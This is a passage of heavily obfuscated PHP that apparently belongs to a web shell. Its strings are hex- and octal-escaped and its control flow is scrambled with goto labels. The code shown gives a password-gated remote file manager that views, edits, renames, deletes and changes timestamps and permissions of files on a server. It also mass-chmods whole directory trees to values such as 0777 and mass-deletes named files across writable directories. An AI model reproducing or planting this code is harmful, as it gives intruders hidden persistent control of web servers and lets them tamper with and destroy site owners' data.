ile}\47\x3e\x3c\x69\x20\143\154\141\163\163\75\x27\142\151\x20\x62\151\55\160\x65\x6e\x63\x69\154\55\163\x71\165\x61\162\x65\x27\76\74\x2f\x69\x3e\74\57\141\x3e\xa\74\141\40\143\154\x61\x73\x73\x3d\x27\x62\x74\156\x20\142\x74\x6e\x2d\157\x75\x74\154\151\x6e\145\x2d\154\x69\x67\150\x74\x20\x62\164\156\55\163\x6d\47\40\150\x72\145\x66\75\47\x3f\x64\x69\x72\x3d{$path}\x26\x61\x63\164\151\157\156\75\x72\x65\x6e\x61\155\145\x26\157\160\x6e\75{$file}\47\x3e\74\151\40\x63\154\x61\163\163\75\47\x62\151\x20\142\151\55\160\145\x6e\x63\x69\x6c\55\146\x69\154\154\47\x3e\74\x2f\x69\76\x3c\x2f\x61\x3e\12\x3c\141\40\143\154\x61\163\x73\75\x27\142\x74\x6e\40\142\x74\156\55\x6f\165\164\154\151\156\145\x2d\x6c\x69\147\x68\x74\x20\x62\164\x6e\x2d\x73\x6d\47\x20\150\x72\x65\146\75\47\77\144\151\x72\75{$path}\x26\x61\x63\x74\151\157\156\75\x63\x68\x61\x6e\x67\x65\x6d\157\x64\x69\146\x69\145\x64\x26\157\160\x6e\75{$file}\47\76\x3c\151\40\x63\x6c\141\x73\x73\x3d\x27\142\x69\40\x62\151\55\x63\x61\154\145\156\x64\x61\162\55\144\141\164\x65\x27\76\74\57\x69\76\74\x2f\141\x3e\xa\74\141\x20\143\154\141\163\163\x3d\47\142\x74\156\x20\x62\x74\156\x2d\x6f\x75\x74\154\151\156\145\x2d\x6c\151\x67\x68\x74\40\x62\x74\156\x2d\163\x6d\x27\x20\150\x72\x65\x66\x3d\47\77\144\151\162\75{$path}\46\x61\143\x74\151\157\x6e\75\143\x68\145\155\157\x64\46\x6f\160\x6e\75{$file}\47\76\x3c\x69\40\x63\x6c\x61\x73\x73\x3d\47\x62\x69\40\x62\x69\x2d\146\151\154\x65\55\145\141\x72\155\141\x72\153\55\155\x65\x64\151\143\141\x6c\47\x3e\x3c\57\151\76\74\x2f\141\x3e\xa\74\x61\40\143\154\141\x73\163\x3d\x27\x62\x74\x6e\40\x62\x74\156\x2d\157\165\164\154\x69\x6e\145\x2d\x64\x61\x6e\x67\x65\x72\x20\x62\164\x6e\55\163\x6d\47\x20\x68\x72\145\x66\x3d\x27\77\144\151\x72\x3d{$path}\46\x61\143\x74\x69\x6f\156\75\144\x65\154\145\x74\x65\137\x66\x69\x6c\x65\x26\x6f\160\x6e\75{$file}\47\76\x3c\151\40\x63\154\x61\x73\x73\x3d\47\142\x69\40\142\151\x2d\164\162\x61\x73\x68\55\146\x69\154\154\47\x3e\74\57\x69\x3e\74\x2f\141\76\xa\x3c\57\x64\151\166\x3e\x3c\144\151\x76\x20\x63\154\141\x73\163\75\x27\x63\x61\162\144\40\x63\141\162\144\x2d\x62\x6f\x64\x79\x20\164\145\170\x74\55\x64\141\162\x6b\40\x69\156\160\165\164\55\147\162\x6f\x75\160\40\155\142\55\x33\x27\x3e\x3c\160\76\x41\x72\145\x20\171\157\x75\40\x73\x75\162\145\x20\164\x6f\40\144\x65\154\x65\x74\x65\x20\x3a\40" . basename($file) . "\40\77\74\x2f\x70\x3e\xa\11\11\11\x3c\x66\157\162\x6d\x20\155\145\164\150\157\144\75\47\120\117\x53\124\47\x3e\12\11\x9\11\x9\74\141\40\143\154\x61\163\x73\x3d\x27\142\x74\156\x20\x62\x74\x6e\55\x64\141\x72\x6b\x20\142\x74\156\x2d\142\154\x6f\143\x6b\40\142\x74\156\x2d\x73\155\x27\x20\150\162\145\146\x3d\x27\77\x64\x69\162\x3d{$dir}\47\76\116\x6f\x3c\57\x61\x3e\xa\11\x9\11\x9\74\x69\156\x70\x75\164\40\x74\171\x70\x65\75\x27\x73\165\142\155\x69\x74\47\40\156\x61\x6d\x65\75\47\x79\145\141\150\170\x27\40\143\x6c\x61\x73\163\x3d\x27\142\164\x6e\x20\x62\164\156\x2d\x73\x75\x63\143\x65\163\163\40\142\164\156\55\x62\x6c\x6f\x63\153\40\142\164\x6e\x2d\x73\155\47\40\166\141\x6c\165\x65\75\47\x59\x65\x73\47\76\12\11\11\x9\x3c\x2f\146\157\162\x6d\76\xa\11\11\x3c\57\144\x69\x76\76"; } goto MxyOS; KTKOH: if ($_1337["\151\144"] == "\155\x61\x73\x73\x63\150\x65\155\x6f\144") { s(); echo "\74\143\x65\156\164\145\x72\40\x63\x6c\x61\163\163\x3d\42\141\156\165\x22\76\x4d\141\x73\163\40\x43\x68\x61\x6e\x67\x65\x20\120\x65\x72\x6d\x69\163\163\151\157\x6e\163\x20\x28\x43\150\155\x6f\144\x29\x20\x41\x6c\154\40\x46\151\x6c\145\57\104\151\162\x3c\x2f\143\x65\x6e\164\145\162\x3e"; echo "\12\40\x20\40\40\x3c\x64\x69\166\x20\143\x6c\x61\163\x73\75\42\x63\x61\162\144\x20\143\x61\x72\x64\x2d\x62\x6f\x64\x79\x20\x74\145\x78\164\55\144\x61\162\x6b\x20\151\x6e\160\165\x74\x2d\x67\x72\x6f\x75\x70\x20\x6d\142\x2d\x33\42\x3e\12\40\40\x20\40\x20\40\40\40\x3c\x66\157\162\155\x20\x6d\x65\164\x68\x6f\x64\75\42\x50\x4f\123\124\x22\x3e\xa\40\40\40\40\40\40\40\40\x20\40\x20\40\x3c\x69\x20\x63\x6c\x61\x73\x73\75\42\142\x69\x20\x62\x69\55\x66\157\154\144\145\162\x22\x3e\x3c\x2f\151\76\x20\104\x69\x72\x65\x63\164\x6f\x72\x79\x3a\xa\x20\40\x20\40\40\40\40\x20\40\x20\40\x20\x3c\x69\156\160\x75\x74\x20\143\154\141\163\163\x3d\x22\x66\157\x72\155\55\143\157\x6e\164\x72\x6f\154\x20\142\164\156\x2d\x73\155\x20\x74\x65\170\x74\55\144\x61\162\x6b\x22\x20\164\x79\x70\145\75\x22\164\145\170\164\42\x20\156\x61\155\x65\75\x22\x64\x69\162\42\40\166\x61\x6c\x75\x65\x3d\42" . htmlspecialchars($dir) . "\42\x3e\xa\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\40\x3c\x64\151\166\40\x63\154\x61\163\163\x3d\x22\146\x6f\162\x6d\x2d\143\150\x65\x63\153\42\x3e\xa\40\x20\x20\x20\x20\x20\40\40\40\40\40\x20\40\40\x20\40\74\151\x6e\x70\x75\164\40\143\x6c\x61\x73\163\x3d\42\146\x6f\162\155\55\x63\x68\145\143\153\55\151\156\x70\165\x74\42\x20\164\x79\160\x65\x3d\42\162\x61\x64\151\157\x22\x20\x6e\x61\155\x65\x3d\x22\164\x61\x72\147\x65\x74\137\164\171\x70\145\42\40\x76\141\x6c\x75\x65\x3d\x22\x66\x69\x6c\x65\42\40\143\x68\x65\143\x6b\x65\144\x3e\xa\40\40\x20\x20\x20\x20\40\40\40\40\40\40\40\40\x20\40\74\x6c\141\142\145\154\x20\x63\154\x61\163\x73\75\x22\x66\x6f\x72\x6d\55\143\150\x65\x63\153\x2d\154\141\142\145\154\x22\40\146\157\162\x3d\x22\146\x69\x6c\x65\42\76\x46\151\154\x65\x3c\x2f\154\x61\x62\145\154\x3e\12\40\40\x20\x20\40\40\x20\x20\40\40\40\x20\x3c\57\x64\x69\x76\76\12\x20\x20\x20\x20\40\40\x20\40\40\40\40\x20\74\x64\151\166\40\x63\x6c\x61\x73\x73\75\x22\x66\157\162\155\55\143\150\145\143\x6b\42\76\xa\40\40\40\40\40\40\40\x20\x20\x20\40\40\40\40\x20\x20\74\151\156\x70\165\164\x20\x63\154\x61\x73\x73\x3d\42\146\x6f\162\155\55\x63\x68\145\143\153\x2d\151\156\x70\x75\x74\42\40\164\171\x70\145\x3d\x22\162\x61\144\151\157\x22\x20\156\x61\x6d\x65\x3d\x22\x74\x61\x72\147\x65\164\137\164\x79\x70\x65\x22\40\x76\x61\x6c\x75\145\x3d\42\144\151\162\x22\76\xa\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\40\40\x20\40\x20\x3c\154\x61\x62\145\154\40\143\x6c\x61\x73\163\75\42\x66\157\x72\155\55\x63\x68\x65\143\x6b\x2d\154\141\x62\x65\x6c\x22\40\x66\157\x72\x3d\42\x64\151\162\42\x3e\104\151\162\x65\x63\x74\157\162\x79\x3c\x2f\x6c\x61\x62\x65\154\76\12\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\74\57\144\x69\166\76\xa\40\x20\40\40\x20\40\x20\x20\x20\x20\40\40\x3c\151\x20\x63\154\x61\163\x73\75\x22\x62\151\x20\x62\151\x2d\146\x69\x6c\145\55\145\141\162\155\x61\162\x6b\42\x3e\x3c\x2f\x69\x3e\x20\120\x65\x72\155\151\163\163\151\x6f\156\x73\72\12\40\40\x20\40\40\40\40\x20\40\40\x20\x20\74\151\x6e\160\165\164\x20\x63\x6c\x61\163\163\x3d\42\146\157\162\x6d\55\143\157\x6e\164\x72\x6f\154\40\x62\164\156\55\163\155\40\164\145\x78\164\x2d\x64\x61\162\153\42\40\164\171\x70\x65\x3d\x22\x74\145\x78\164\42\x20\x6e\141\155\145\75\42\x70\x65\162\155\x69\x73\163\151\157\x6e\x22\40\x70\154\141\143\x65\x68\157\x6c\x64\145\x72\75\42\60\x37\x37\x37\42\x3e\12\x20\40\40\x20\40\40\x20\40\40\x20\x20\x20\74\x64\151\x76\x20\143\x6c\141\163\x73\75\42\x64\x2d\147\x72\x69\144\40\147\141\160\55\x32\x22\76\12\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\x3c\151\x6e\160\165\x74\x20\143\154\141\163\163\75\x22\x62\164\156\40\x62\x74\156\55\144\x61\162\x6b\40\142\164\x6e\55\x73\155\42\x20\164\171\160\x65\75\x22\x73\x75\142\155\151\x74\42\40\x6e\141\155\x65\x3d\x22\143\150\141\x6e\147\145\x22\x20\x76\141\x6c\165\145\x3d\x22\123\165\x62\x6d\151\x74\41\42\76\xa\x20\40\x20\40\x20\40\40\x20\x20\40\40\x20\74\57\x64\151\166\x3e\12\x20\x20\40\x20\40\x20\40\40\x3c\57\x66\x6f\x72\x6d\x3e\xa\x20\40\x20\40\x3c\57\x64\x69\x76\x3e"; function massChmod($dir, $targetType, $permission, &$changedFiles = array()) { $files = glob($dir . "\57\x2a", GLOB_BRACE); foreach ($files as $file) { if ($targetType === "\x66\x69\154\145" && is_file($file) || $targetType === "\144\x69\x72" && is_dir($file)) { if (isset($_POST["\x63\150\x61\x6e\x67\x65"])) { if (chmod($file, octdec($permission))) { $changedFiles[] = $file; } } } if (is_dir($file)) { massChmod($file, $targetType, $permission, $changedFiles); } } } if (isset($_POST["\143\x68\141\156\147\145"])) { $dir = $_POST["\144\x69\162"]; $targetType = $_POST["\164\x61\x72\x67\145\164\137\164\171\160\x65"]; $permission = $_POST["\x70\x65\x72\x6d\151\x73\163\x69\157\x6e"]; $changedFiles = array(); massChmod($dir, $targetType, $permission, $changedFiles); if (!empty($changedFiles)) { echo "\x3c\144\151\166\x20\x63\x6c\x61\x73\163\75\42\x63\x61\x72\x64\40\143\141\x72\x64\x2d\x62\x6f\144\x79\40\x74\x65\x78\x74\x2d\144\141\162\153\x22\x3e"; echo "\x3c\160\76\x43\150\141\x6e\x67\145\40\x50\x65\162\155\x69\x73\163\151\x6f\156\163\40\164\157\x20\x3c\x65\155\76{$permission}\74\57\145\x6d\x3e\x3c\57\x70\x3e"; echo "\74\165\x6c\x3e"; foreach ($changedFiles as $changedFile) { echo "\x3c\154\151\76{$changedFile}\74\x2f\x6c\151\76"; } echo "\74\57\165\x6c\76"; echo "\74\x2f\144\151\x76\x3e"; } } } goto xqoVY; ZtS8W: $paths = explode("\57", $path); goto Nd1vW; CIER1: if ($_1337["\x69\144"] == "\144\x65\154\x65\x74\145") { function mass_delete($dir, $namefile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\57{$dirb}"; $ = $dirc . "\57" . $namefile; if ($dirb === "\x2e" || $dirb === "\56\56") { continue; } if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($)) { echo "\133\74\x67\162\76\x3c\x69\x20\143\x6c\x61\x73\163\x3d\x27\142\x69\40\x62\x69\x2d\143\150\x65\x63\x6b\x2d\141\154\154\x27\x3e\x3c\x2f\x69\x3e\x3c\x2f\x67\162\x3e\x5d\46\156\x62\163\160\73{$}\74\x62\x72\x3e"; unlink($); } mass_delete($dirc, $namefile); } } } } } if ($_1337["\163\x74\x61\162\x74"]) { mass_delete($_1337["\x64\137\x64\x69\162"], $_1337["\144\x5f\x66\x69\x6c\x65"]); } s(); echo "\x3c\x63\x65\x6e\x74\x65\162\x20\143\x6c\141\x73\x73\x3d\42\141\x6e\165\x22\76\115\x61\163\x73\x20\x44\x65\x6c\x65\x74\x65\x3c\x2f\143\x65\x6e\164\x65\162\76"; echo "\xa\40\40\x20\x20\74\144\x69\166\x20\143\154\141\163\x73\x3d\47\143\141\x72\144\x20\143\141\162\x64\x2d\x62\x6f\x64\171\x20\164\145\x78\164\x2d\x64\x61\x72\153\40\x69\156\160\165\164\x2d\147\x72\x6f\x75\x70\x20\155\x62\55\x33\x27\x3e\12\40\40\x20\40\40\40\x20\40\74\x66\x6f\162\x6d\40\x6d\145\x74\150\x6f\144\75\x27\x50\x4f\123\124\47\76\xa\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\x3c\151\40\143\x6c\x61\x73\x73\75\47\x62\151\40\142\x69\55\146\x6f\x6c\144\145\162\47\76\74\x2f\151\x3e\40\x44\151\162\x65\x63\x74\157\162\x79\x3a\xa\40\40\x20\40\x20\40\x20\x20\40\x20\x20\40\x3c\x69\156\160\x75\164\x20\143\154\141\x73\163\75\x27\146\157\x72\x6d\x2d\143\x6f\x6e\164\x72\x6f\154\x20\x62\x74\x6e\55\163\x6d\40\164\x65\x78\x74\55\x64\x61\x72\153\x27\x20\x74\171\160\145\x3d\47\x74\145\170\x74\x27\x20\156\x61\155\x65\75\x27\144\x5f\144\151\162\x27\40\166\141\x6c\165\x65\x3d\x27{$dir}\x2f\x27\x20{$_r}\76\12\40\40\x20\40\x20\x20\40\x20\40\40\x20\40\x20\40\40\x20\74\x69\40\143\x6c\x61\163\163\x3d\47\x62\x69\x20\x62\x69\55\146\x69\x6c\x65\x2d\145\141\162\x6d\x61\162\153\47\x3e\x3c\57\151\76\x20\x46\151\x6c\x65\156\141\155\145\72\12\x20\x20\x20\40\x20\40\x20\40\x20\40\40\x20\x3c\144\151\166\x20\143\154\141\x73\163\x3d\x27\151\156\x70\x75\x74\x2d\147\x72\x6f\165\x70\47\76\12\x20\40\x20\x20\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\74\151\156\x70\x75\164\x20\x63\154\141\x73\163\x3d\47\x66\x6f\x72\x6d\x2d\143\157\x6e\x74\162\157\154\40\x62\x74\x6e\x2d\163\155\40\164\x65\170\x74\x2d\x64\141\x72\153\47\x20\x74\171\x70\x65\75\47\x74\x65\x78\x74\x27\x20\x6e\x61\x6d\145\75\x27\144\x5f\146\x69\x6c\145\47\x20\x70\x6c\141\143\x65\150\157\x6c\x64\x65\162\75\x27{$resoolt}\47\40{$_r}\x3e\x3c\142\162\x3e\xa\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\74\x64\x69\x76\40\x63\154\x61\x73\x73\75\47\x69\156\x70\x75\164\x2d\x67\x72\x6f\x75\160\x2d\x61\160\160\x65\156\x64\47\x3e\12\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\x3c\x69\156\x70\165\164\x20\143\154\141\163\x73\75\47\x62\x74\x6e\x20\142\x74\x6e\x2d\x64\141\162\x6b\x20\x62\x74\156\x2d\x73\155\47\40\164\171\160\x65\x3d\x27\163\165\142\x6d\151\x74\x27\40\x6e\x61\155\x65\x3d\47\x73\164\141\162\x74\47\x20\x76\x61\x6c\x75\x65\75\x27\x44\145\154\x65\164\145\41\x27\76\xa\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x3c\x2f\x64\151\166\76\12\40\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\x3c\x2f\144\x69\x76\x3e\xa\40\40\40\40\40\40\40\x20\74\57\x66\157\162\155\x3e\12\40\40\x20\40\74\57\144\151\x76\x3e"; } goto xxaNk; L2Ix3: if ($_1337["\141\143\x74\151\157\156"] == "\x63\x68\x65\x6d\x6f\x64") { s(); function chmodItem($itemPath, $newPermission) { if (is_file($itemPath)) { if (chmod($itemPath, octdec($newPermission))) { return true; } else { return false; } } return false; } function chmodDirectory($dirPath, $newPermission) { $items = scandir($dirPath); foreach ($items as $item) { if ($item != "\56" && $item != "\56\x2e") { $itemPath = $dirPath . "\x2f" . $item; if (is_dir($itemPath)) { chmodDirectory($itemPath, $newPermission); } chmodItem($itemPath, $newPermission); } } } $itemToChmod = $_GET["\157\160\x6e"]; $itemPathToChmod = $path . "\x2f" . $itemToChmod; echo "\74\144\151\x76\40\x63\154\141\x73\163\x3d\47\x62\x74\156\55\x67\162\x6f\x75\160\x27\x3e\12\x20\40\40\40\74\141\x20\x63\x6c\x61\163\163\75\47\x62\164\x6e\40\142\x74\x6e\x2d\157\165\164\154\151\156\145\55\154\x69\x67\x68\164\x20\142\x74\x6e\x2d\163\x6d\47\x20\x68\162\x65\146\x3d\x27\77\x64\151\x72\75{$path}\x26\141\143\x74\151\x6f\x6e\75\x76\x69\x65\167\46\x6f\160\156\75{$file}\47\x3e\x3c\151\x20\x63\154\141\x73\x73\75\47\x62\151\x20\142\x69\55\145\171\x65\x27\76\74\x2f\151\x3e\74\57\x61\76\xa\40\x20\x20\40\74\141\x20\143\154\x61\x73\x73\75\x27\x62\x74\x6e\x20\x62\x74\156\55\x6f\x75\164\x6c\x69\x6e\x65\55\x6c\x69\147\x68\164\x20\142\164\x6e\x2d\163\x6d\x27\40\x68\x72\145\x66\x3d\x27\x3f\x64\151\x72\x3d{$path}\x26\x61\x63\x74\151\x6f\x6e\x3d\x65\x64\x69\x74\46\157\160\x6e\x3d{$file}\x27\x3e\x3c\x69\40\143\x6c\141\163\x73\75\47\142\151\x20\x62\151\x2d\x70\x65\x6e\143\151\x6c\x2d\163\x71\165\x61\162\x65\x27\76\x3c\57\151\x3e\74\x2f\x61\x3e\xa\40\x20\40\40\x3c\141\x20\x63\154\141\163\163\75\47\x62\x74\156\x20\x62\x74\156\x2d\157\165\x74\x6c\x69\156\145\55\x6c\151\x67\x68\x74\40\x62\164\x6e\x2d\163\155\x27\x20\150\x72\145\x66\75\x27\x3f\x64\151\x72\x3d{$path}\x26\141\x63\164\x69\x6f\156\75\x72\145\156\x61\155\x65\x26\x6f\160\156\x3d{$file}\47\76\74\x69\x20\x63\x6c\x61\x73\163\75\47\142\151\40\x62\x69\x2d\160\145\x6e\x63\x69\154\55\146\151\x6c\154\47\76\x3c\x2f\x69\76\x3c\x2f\141\x3e\xa\x20\40\x20\x20\74\141\x20\x63\x6c\x61\163\163\75\47\142\x74\x6e\40\142\x74\x6e\x2d\x6f\165\x74\154\x69\x6e\x65\x2d\154\x69\x67\150\x74\40\x62\164\156\x2d\163\155\47\x20\150\162\x65\x66\x3d\x27\77\x64\x69\x72\75{$path}\46\141\143\x74\151\x6f\x6e\x3d\x63\150\141\x6e\147\145\155\x6f\x64\151\x66\x69\x65\144\x26\157\160\x6e\x3d{$file}\x27\76\74\151\x20\143\154\x61\x73\x73\x3d\47\142\x69\40\x62\x69\x2d\143\x61\154\145\x6e\144\x61\162\55\x64\141\x74\145\x27\x3e\x3c\57\151\76\x3c\x2f\141\x3e\12\x20\40\x20\x20\x3c\x61\40\143\x6c\141\163\163\x3d\47\x62\x74\156\x20\x62\x74\156\55\x6f\165\164\x6c\x69\156\x65\55\x6c\151\x67\150\x74\40\x62\164\156\55\163\x6d\x27\40\150\162\x65\x66\x3d\47\77\144\151\162\x3d{$path}\46\141\x63\164\151\157\156\75\x63\150\x65\155\157\144\x26\157\160\x6e\75{$file}\x27\76\74\x69\40\143\x6c\141\x73\x73\75\47\142\x69\x20\142\151\x2d\146\151\x6c\x65\x2d\145\141\162\155\141\x72\153\55\155\145\x64\151\x63\141\x6c\47\76\74\x2f\151\x3e\74\57\141\76\12\x20\x20\40\40\74\141\x20\x63\154\x61\163\163\x3d\47\142\164\156\40\x62\164\156\x2d\x6f\x75\164\154\x69\156\x65\55\x64\x61\x6e\x67\x65\162\40\x62\164\x6e\x2d\163\155\47\40\150\x72\145\x66\75\x27\x3f\x64\x69\162\75{$path}\x26\141\143\164\151\x6f\x6e\x3d\x64\x65\154\x65\x74\x65\x5f\146\151\154\x65\x26\157\160\x6e\x3d{$file}\x27\76\x3c\151\x20\x63\154\141\x73\163\x3d\47\142\151\x20\x62\x69\x2d\x74\x72\141\x73\150\x2d\x66\151\154\x6c\x27\x3e\x3c\57\x69\x3e\x3c\x2f\x61\76\xa\40\x20\x20\40\x3c\57\x64\151\x76\76\xa\40\x20\40\40\x3c\x62\x72\76\x3c\151\40\x63\154\x61\163\x73\75\47\x62\x69\40" . (is_dir($itemPathToChmod) ? "\142\x69\x2d\146\x6f\x6c\x64\145\162" : "\x62\x69\55\146\x69\x6c\x65\x2d\145\141\x72\x6d\x61\x72\153") . "\47\x3e\74\x2f\151\76\72\x26\x6e\142\x73\x70\73" . basename($itemPathToChmod) . "\x3c\57\x62\x72\x3e\xa\40\40\x20\x20\74\146\157\x72\x6d\x20\x6d\145\164\x68\x6f\x64\75\x27\120\x4f\x53\x54\47\76\x3c\x64\151\166\x20\x63\x6c\141\x73\163\75\47\151\156\160\165\164\x2d\x67\x72\x6f\x75\x70\47\76\x3c\151\156\x70\x75\164\40\x63\154\x61\163\163\x3d\47\146\x6f\162\x6d\x2d\143\157\x6e\x74\x72\157\x6c\40\x62\164\156\55\163\155\x27\x20\x74\171\160\x65\75\47\x74\145\x78\x74\x27\x20\x6e\141\x6d\x65\x3d\x27\156\x65\167\137\160\x65\162\x6d\151\163\x73\x69\157\x6e\x27\x20\160\154\141\143\145\x68\157\x6c\x64\x65\x72\x3d\x27\60\x37\x37\67\x27\x20{$_r}\76\xa\40\40\40\40\x3c\x62\x75\x74\x74\157\156\40\x63\154\141\163\163\75\x27\x62\x74\x6e\40\142\164\x6e\55\x6f\x75\164\154\151\x6e\145\x2d\x6c\151\x67\150\164\40\x62\x74\x6e\55\163\155\x27\x20\x74\171\x70\145\75\x27\163\x75\142\x6d\x69\164\47\x20\156\141\x6d\x65\75\x27\x63\x68\145\155\157\144\153\141\156\x27\x3e\x3c\151\x20\x63\154\x61\163\163\75\x27\142\151\40\142\x69\55\x65\x6d\x6f\x6a\x69\55\163\155\151\x6c\145\x2d\165\x70\x73\x69\x64\x65\55\x64\157\167\x6e\47\x3e\74\57\151\76\x3c\57\x62\x75\x74\164\x6f\156\x3e\xa\40\x20\x20\x20\x3c\x2f\x64\x69\x76\76\12\40\40\40\x20\x3c\x2f\x66\157\x72\x6d\x3e"; if (isset($_POST["\x63\150\145\155\157\x64\x6b\x61\156"])) { $newPermission = $_POST["\156\145\x77\x5f\x70\x65\162\155\x69\163\x73\151\157\x6e"]; if (is_dir($itemPathToChmod)) { chmodDirectory($itemPathToChmod, $newPermission); } else { chmodItem($itemPathToChmod, $newPermission); } echo "\74\x73\164\162\x6f\156\x67\x3e\x43\150\141\156\147\145\40\120\145\162\x6d\151\163\x73\151\x6f\156\x3c\57\163\164\162\157\x6e\x67\x3e\40\x4f\x4b\x21\40" . ok() . "\x3c\x2f\x64\151\x76\76"; } } goto H4Yyw; JjZzp: if ($_1337["\x69\144"] == "\x63\x68\x6d\x6f\144") { s(); echo "\x3c\x63\145\156\x74\x65\162\40\x63\154\141\x73\x73\75\x22\x61\156\x75\42\x3e\x4d\x61\x73\163\40\x43\150\x61\156\147\145\40\x50\x65\162\155\x69\x73\x73\x69\x6f\x6e\x73\x20\x28\103\150\x6d\x6f\144\x29\74\57\x63\145\156\x74\x65\162\76"; echo "\12\40\40\x20\40\40\40\40\40\74\144\x69\166\40\143\x6c\141\x73\163\75\47\x63\x61\162\144\x20\143\x61\x72\x64\x2d\x62\x6f\x64\171\x20\164\x65\170\x74\x2d\x64\x61\x72\x6b\x20\151\x6e\160\165\x74\55\147\162\x6f\x75\x70\x20\x6d\x62\55\x33\47\76\12\x20\x20\40\40\x20\x20\x20\40\74\146\157\x72\155\40\x6d\x65\164\x68\157\x64\75\47\x50\x4f\123\x54\47\x3e\x20\12\40\x20\x20\40\40\x20\40\x20\x3c\x69\x20\x63\154\141\163\163\x3d\x27\x62\151\40\142\x69\55\x66\x6f\x6c\x64\x65\162\x27\x3e\x3c\x2f\151\x3e\40\104\151\x72\x65\x63\x74\x6f\162\x79\x3a\xa\x20\x20\x20\40\40\40\40\40\74\151\x6e\x70\165\x74\40\143\154\x61\163\163\x3d\x27\x66\157\x72\x6d\x2d\x63\157\x6e\x74\x72\x6f\x6c\x20\x62\x74\156\55\x73\155\40\164\x65\x78\164\55\144\x61\162\153\47\40\x74\x79\160\x65\75\x27\164\145\170\x74\x27\40\x6e\141\155\x65\75\47\x64\151\x72\47\x20\166\x61\154\x75\145\75\x27{$dir}\x2f\x27\x3e\xa\40\x20\40\x20\40\x20\x20\x20\x3c\151\x20\x63\154\141\163\x73\75\47\142\151\40\x62\151\55\x66\x69\154\145\55\x65\141\x72\x6d\141\162\x6b\47\x3e\74\x2f\x69\x3e\40\116\141\155\x61\40\x46\151\x6c\x65\72\12\x20\x20\40\40\40\x20\x20\x20\74\151\156\160\x75\x74\x20\x63\154\141\163\163\75\47\146\x6f\162\x6d\55\143\157\156\x74\162\157\154\x20\142\x74\x6e\55\163\155\x20\x74\x65\x78\x74\x2d\x64\141\x72\x6b\x27\40\164\171\160\x65\x3d\47\164\x65\x78\x74\x27\x20\156\141\155\145\x3d\47\146\x69\154\145\47\40\x70\154\x61\143\x65\x68\157\x6c\x64\x65\x72\x3d\47\154\157\154\x63\x61\x74\x73\56\x74\170\164\47\76\12\x20\x20\x20\x20\x20\40\40\40\x3c\x69\40\143\x6c\141\x73\x73\75\47\x62\151\40\x62\151\x2d\146\x69\x6c\145\55\x65\x61\x72\155\x61\x72\x6b\47\76\74\57\151\76\x20\x50\145\x72\x6d\151\163\163\151\x6f\156\x73\72\12\x20\x20\40\40\40\40\x20\40\x3c\151\156\x70\165\x74\x20\x63\x6c\x61\x73\163\75\47\x66\x6f\x72\155\x2d\143\x6f\156\164\162\157\x6c\40\142\164\x6e\x2d\163\x6d\40\164\145\x78\164\55\x64\141\162\153\47\40\x74\x79\160\x65\75\47\164\x65\x78\x74\47\x20\156\141\x6d\145\x3d\47\160\145\162\155\x69\x73\x73\x69\x6f\x6e\47\x20\160\154\x61\x63\145\x68\x6f\154\x64\145\x72\75\x27\x30\x37\67\x37\47\x3e\12\x20\40\40\x20\40\40\40\40\x3c\x64\x69\166\40\143\x6c\141\163\x73\x3d\x27\144\55\147\x72\151\x64\x20\147\141\x70\x2d\62\x27\76\12\40\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x3c\x69\x6e\x70\x75\x74\x20\143\x6c\141\x73\163\75\x27\x62\164\156\x20\x62\x74\x6e\55\x64\x61\x72\153\x20\142\164\x6e\x2d\163\155\x27\40\164\x79\160\145\75\x27\163\165\x62\155\151\x74\47\x20\x6e\x61\x6d\145\75\x27\x63\150\x61\x6e\x67\145\x27\40\x76\x61\154\x75\145\75\x27\123\165\142\x6d\x69\x74\x21\x27\76\xa\x20\x20\40\x20\x20\x20\40\x20\74\x2f\144\151\x76\x3e\xa\x20\x20\40\40\40\40\x20\40\x3c\57\x66\x6f\162\x6d\x3e\xa\40\x20\x20\x20\x20\40\x20\x20\x3c\57\144\x69\x76\x3e"; $dir = $_POST["\x64\x69\x72"]; $file = $_POST["\146\x69\154\x65"]; $permission = $_POST["\160\145\x72\155\151\163\163\151\x6f\156"]; $changedFiles = array(); function getDirContents($dir, &$results = array()) { $files = array_diff(scandir($dir), array("\x2e", "\x2e\56")); foreach ($files as $file) { $path = $dir . "\x2f" . $file; if (is_dir($path)) { $results = getDirContents($path, $results); } else { $results[] = $path; } } return $results; } $files = getDirContents($dir); foreach ($files as $name) { if (basename($name) === $file) { if (isset($_POST["\x63\150\x61\156\x67\145"])) { if (chmod($name, octdec($permission))) { $changedFiles[] = $name; } } } } if (!empty($changedFiles)) { echo "\x3c\144\151\166\40\x63\x6c\x61\x73\163\75\x27\x63\141\x72\x64\40\143\x61\x72\144\x2d\x62\x6f\x64\171\x20\x74\x65\170\x74\55\144\x61\162\x6b\x27\76"; echo "\74\160\x3e\x43\150\x61\156\x67\x65\x20\x50\x65\x72\x6d\x69\x73\x73\x69\x6f\156\163\x20\74\x65\155\x3e{$file}\x3c\57\145\155\x3e\x20\x74\157\x20\x3c\145\155\x3e{$permission}\x3c\57\x65\155\76\x3c\x2f\160\x3e"; echo "\x3c\165\154\76"; foreach ($changedFiles as $changedFile) { echo "\x3c\154\x69\76{$changedFile}\74\57\x6c\x69\76"; } echo "\x3c\57\165\x6c\76"; echo "\74\57\144\151\x76\76"; } } goto KTKOH; ZaPiC: if (!empty($auth_pass)) { if (isset($_POST["\160\x61\163\163"]) && md5($_POST["\x70\141\163\163"]) == $auth_pass) { Yolosetcookie(md5($_SERVER["\110\x54\124\120\137\x48\117\x53\x54"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["\110\124\x54\120\x5f\110\x4f\123\124"])]) || $_COOKIE[md5($_SERVER["\110\x54\124\x50\137\x48\x4f\123\x54"])] != $auth_pass) { logsx(); } } goto o9cS8; HBdOH: if 